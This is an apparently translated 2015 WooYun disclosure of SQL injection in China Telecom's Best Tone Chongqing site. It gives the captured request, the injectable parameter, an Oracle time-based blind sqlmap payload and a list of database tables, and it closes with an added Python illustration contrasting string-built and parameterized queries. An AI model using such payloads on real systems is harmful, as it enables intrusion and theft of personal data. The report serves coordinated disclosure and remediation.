Vulnerability summary
Defect ID: wooyun-2015-0129810
Title: SQL injection in the Chongqing branch site of Best Tone (号码百事通) exposes millions of records
Vendor: China Telecom
Author: 神秘的小胖
Submitted: 2015-07-29 18:22
Fixed: 2015-09-14 15:38
Published: 2015-09-14 15:38
Type: SQL injection
Severity: High
Self-assessed Rank: 20
Status: handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2015-07-29: details sent to the vendor, awaiting vendor handling
2015-07-31: vendor confirmed; details visible to the vendor only
2015-08-10: details opened to core white hats and experts in the relevant field
2015-08-20: details opened to regular white hats
2015-08-30: details opened to intern white hats
2015-09-14: details opened to the public
Brief description:
Detailed description:
The Chongqing branch site of Best Tone has an SQL injection flaw: information on millions of users can be read.
Vulnerable site: http://www.118114.cq.cn/
First, capture the request sent by one of the pages:
POST /main/queryMemberByGroupId.do?flag=1 HTTP/1.1
Host: www.118114.cq.cn
User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.118114.cq.cn/main/assistant/groupMemberList.jsp
Cookie: JSESSIONID=9C39950AC11146057A0FB8958DB41B03
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
productId=&name=11&namepy=a&method=2&groupId=&Search2=%B2%E9%D1%AF
The namepy parameter is injectable.
Dropped it straight into sqlmap:
Parameter: namepy (POST)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: productId=&name=11&namepy=a%' AND 7541=DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(116)||CHR(77)||CHR(122),5) AND '%'='&method=2&groupId=&Search2=%B2%E9%D1%AF
---
[21:00:11] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
Database name: "CQ_BTS_TMP"
Some of the tables:
Database: CQ_BTS_TMP
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| T_EDI_CLIENT_OPERATION | 4963239 |
| T_PUSH_MESSAGE | 4249150 |
| T_MEMBER_POOL | 2636766 |
| T_MEMBER_TEL_MYLOG | 1507978 |
| T_EDI_RQ_TEST2 | 1240934 |
| T_EDI_ACCOUNT_SMS | 1174519 |
| T_MEMBER_MYLOG | 979934 |
| T_EXCEL_DATA | 903491 |
| T_IVPN_POOL | 544271 |
| T_EDI_RECOVERY | 488939 |
| IVPN_USERDETAIL_LOG2 | 487887 |
| T_EDI_EROR | 413737 |
| T_IVPN_POOL_LOG | 413559 |
| T_RPT_EDI_ACTIVE_ALLDATA | 358688 |
| TMP_IVPN_COM | 347471 |
| T_MEMBER_MOBILE_20131222 | 317631 |
| T_EDI_RPT_ACCOUNT | 264794 |
| T_EDI_REQUEST | 192346 |
I did not go in and read the contents. Stopping here.
Proof of vulnerability:
Fix recommendation:
You know better than I do.
Copyright notice: when reposting, credit the source: 神秘的小胖@乌云
Vulnerability response
Vendor response:
Severity: Medium
Rank: 8
Confirmed: 2015-07-31 15:36
Vendor reply:
CNVD confirmed and reproduced the reported issue; it has been forwarded through CNCERT to China Telecom Group, which will coordinate handling with the site's management department.
Latest status:
None yet
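The shape of the working payload (it closes a quoted '%...%' pattern and reopens it) shows that the namepy value is being spliced into a LIKE clause as raw text. As an added illustration that is not part of the original report or the site's code, the Python/SQLite sketch below models that query-building pattern beside the parameterized form that removes the flaw; the table, column names and member rows are constructed assumptions, and the tautology used against the vulnerable function stands in for the report's timing condition.

```python
import re
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the member table behind
    # queryMemberByGroupId.do (table, columns and rows are assumptions).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE t_member (name TEXT, namepy TEXT, tel TEXT)")
    conn.executemany("INSERT INTO t_member VALUES (?, ?, ?)", [
        ("张三", "zhangsan", "13800000001"),
        ("李四", "lisi", "13800000002"),
        ("王五", "wangwu", "13800000003"),
    ])
    return conn


def vulnerable_search(conn, namepy):
    # The pattern the report's payload implies: the parameter is pasted into
    # the SQL text, so a value containing a quote can rewrite the WHERE clause.
    sql = f"SELECT name, tel FROM t_member WHERE namepy LIKE '%{namepy}%'"
    return conn.execute(sql).fetchall()


def escape_like(value, esc="\\"):
    # Parameterization alone still lets user-supplied % and _ act as
    # wildcards; escape them so the input matches literally.
    return re.sub(r"([%_\\])", lambda m: esc + m.group(1), value)


def safe_search(conn, namepy):
    # The value is bound as a parameter and travels separately from the SQL
    # text, so no quote in the input can terminate the literal. The same
    # applies to a JDBC PreparedStatement with setString() on Oracle.
    sql = "SELECT name, tel FROM t_member WHERE namepy LIKE ? ESCAPE '\\'"
    return conn.execute(sql, ("%" + escape_like(namepy) + "%",)).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "%' AND 1=1 AND '%'='"   # same shape as the report's payload
    print("vulnerable:", len(vulnerable_search(db, probe)), "rows")
    print("parameterized:", len(safe_search(db, probe)), "rows")
```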